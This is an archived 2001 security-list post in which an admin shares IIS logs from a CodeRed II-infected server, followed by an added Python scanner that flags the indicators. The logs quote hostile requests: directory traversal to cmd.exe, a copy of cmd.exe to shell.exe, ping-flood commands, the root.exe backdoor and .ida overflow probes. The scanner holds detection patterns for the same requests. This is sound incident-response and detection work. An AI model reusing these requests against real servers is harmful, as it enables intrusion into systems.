I have seen this idea floating around the focus-linux list the last couple of days, and I have now seen this in person. I am not at all in favor of shutting down or crashing remote vulnerable servers. You just really never know how important that machine may be; there may be a very good reason the admins are leaving it running until they can take it out of service safely. However, what follows is a very polite notice, and very attention-grabbing. I just started with a new company, and it's the last thing I would have wanted to see, but at least the guy didn't crash the machine; I would have had a far worse day.

2001-08-13 20:19:42 24.xx.xxx.xxx - xx.xx.xx.xxx 80 GET /scripts/root.exe /c+net+send+localhost+%22Your+webserver+has+been+infected+with+the+CodeRed2+worm.+You+have+a+security+hole+so+big+that+you+can+drive+a+Mack+truck+through+it.+You+should+fix+it+before+some+script+kiddie+comes+along+and+takes+advantage+of+it.++Remove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cscripts+(or+wherever+your+CGI+scripts+live,+though+c:%5Cinetpub%5Cscripts+is+the+default+location).%22 502 Lynx/2.8.4dev.7+libwww-FM/2.14

From what I understand, this machine was not even known to be running IIS at all. After further investigation I found it to have been previously rooted on 6/19/01:

2001-06-19 12:22:16 209.xxx.xx.xx - xx.xx.xx.xxx 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe 502 -
2001-06-19 14:47:50 209.xxx.xx.xx - xx.xx.xx.xxx 80 GET /scripts/../../winnt/system32/cmd.exe /c+ping+-v+network-prohibited%20-n++-l+65500+-w+0+ 502 -
2001-06-19 14:58:50 209.xxx.xx.xx - xx.xx.xx.xxx 80 GET /scripts/../../winnt/system32/cmd.exe /c+ping+-v+network-unknown%20-n++-l+65500+-w+0+ 502 -
2001-06-19 17:10:44 209.xxx.xx.xx - xx.xx.xx.xxx 80 GET /scripts/../../winnt/system32/cmd.exe /c+ping+-v+network-unreachable%20-n++-l+65500+-w+0+ 502 -

Does the above look like a script anyone has seen previously?
I also had quite a few of these, all from the same IP, on different days:

2001-07-31 14:36:42 192.xx.xx.xxx - xx.xx.xx.xxx 80 GET /iisstart.asp - 200 -
2001-07-31 14:36:44 192.xx.xx.xxx - xx.xx.xx.xxx 80 GET /x.ida AAAAAAAAAAAAAAAAA-snip-

I haven't seen anything searching for x.ida before, and this was like once a day, on about 4 different days; I thought that was odd. This machine has been taken out of service and replaced, but that is secondary. Has anyone else seen the same scripted response to an infected CodeRed server? This popped up a dialog box essentially saying "You've been owned, fix it", but not causing any reboots or crashes, and certainly not any measures as extreme as I've seen tossed about recently.

Chris Curtiss
xrayspxat_private
--a unix admin in an NT world--

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
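The log excerpts in the post contain the indicators an admin would want to grep for across a whole IIS log set: the `/scripts/../../winnt/system32/cmd.exe` traversal, the copy of `cmd.exe` to `shell.exe`, the `/scripts/root.exe` backdoor the notice asks the admin to remove, and the `.ida` request with a long run of `A`s. The following is an added example, not code from the post or from SecurityFocus: a small scanner that parses IIS W3C extended log lines and tags each of those indicators. It assumes the field order seen in the post's excerpts (date, time, client IP, username, server IP, port, method, URI stem, URI query, status, user agent) and uses constructed sample lines with RFC 5737 addresses in place of the post's masked ones.

```python
"""Flag CodeRed II / IIS traversal indicators in IIS W3C extended log lines.

Added example (hypothetical, not from the original post). Assumed field order,
matching the post's excerpts:
  date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
"""
import re
from urllib.parse import unquote

FIELDS = ("date", "time", "c_ip", "cs_username", "s_ip", "s_port",
          "method", "stem", "query", "status", "user_agent")

# Constructed sample lines (RFC 5737 addresses); their shape mirrors the post's excerpts.
SAMPLE_LOG = r"""
2001-06-19 12:22:16 198.51.100.7 - 192.0.2.10 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe 502 -
2001-07-31 14:36:42 198.51.100.9 - 192.0.2.10 80 GET /iisstart.asp - 200 -
2001-07-31 14:36:44 198.51.100.9 - 192.0.2.10 80 GET /x.ida AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 200 -
2001-08-13 20:19:42 203.0.113.5 - 192.0.2.10 80 GET /scripts/root.exe /c+net+send+localhost+%22Your+webserver+is+infected+with+CodeRed2%22 502 Lynx/2.8.4dev.7+libwww-FM/2.14
2001-08-13 20:20:01 203.0.113.8 - 192.0.2.10 80 GET /index.html - 200 Mozilla/4.0
2001-08-13 20:21:13 198.51.100.7 - 192.0.2.10 80 GET /scripts/../../winnt/system32/cmd.exe /c+ping+-v+network-unreachable%20-n++-l+65500+-w+0+ 502 -
"""


def parse_line(line):
    """Split one W3C extended log line into a dict; return None for blank or '#' comment lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) != len(FIELDS):
        return None  # not the assumed field layout; skip rather than mis-tag
    entry = dict(zip(FIELDS, parts))
    # IIS writes '+' for spaces and percent-encodes the rest (e.g. %5C for '\'),
    # so decode before matching, otherwise an encoded traversal slips past.
    entry["stem_dec"] = unquote(entry["stem"]).lower()
    entry["query_dec"] = unquote(entry["query"].replace("+", " ")).lower()
    return entry


def classify(entry):
    """Return the list of indicator tags that apply to one parsed entry (empty if clean)."""
    tags = []
    stem = entry["stem_dec"].replace("\\", "/")  # treat backslash traversal like '/'
    query = entry["query_dec"]
    if "/../" in stem or stem.startswith("../"):
        tags.append("traversal")
    if stem.endswith("/cmd.exe"):
        tags.append("cmd.exe")
    if stem.endswith("/root.exe"):
        tags.append("root.exe-backdoor")  # the backdoor copy the post's notice asks to remove
    if "shell.exe" in stem or "shell.exe" in query:
        tags.append("shell.exe")
    if stem.endswith(".ida") and re.search(r"a{20,}", query):
        tags.append("ida-overflow-probe")  # the x.ida AAAA... request from the post
    return tags


def scan(log_text):
    """Return (timestamp, client_ip, stem, tags) for every line carrying at least one indicator."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify(entry)
        if tags:
            hits.append((entry["date"] + " " + entry["time"], entry["c_ip"], entry["stem"], tags))
    return hits


def suspicious_clients(hits):
    """Total indicator count per client IP, the view an admin wants when deciding what to look at first."""
    counts = {}
    for _, ip, _, tags in hits:
        counts[ip] = counts.get(ip, 0) + len(tags)
    return counts


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for when, ip, stem, tags in found:
        print(f"{when} {ip:<14} {stem:<42} {','.join(tags)}")
    print(suspicious_clients(found))
```

Run it against a real log by reading the file into `scan()`; lines whose field count does not match the assumed layout are skipped rather than guessed at, so check the `#Fields:` header of your own logs before trusting a clean result.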
This archive was generated by hypermail 2b30 : Tue Aug 14 2001 - 11:02:39 PDT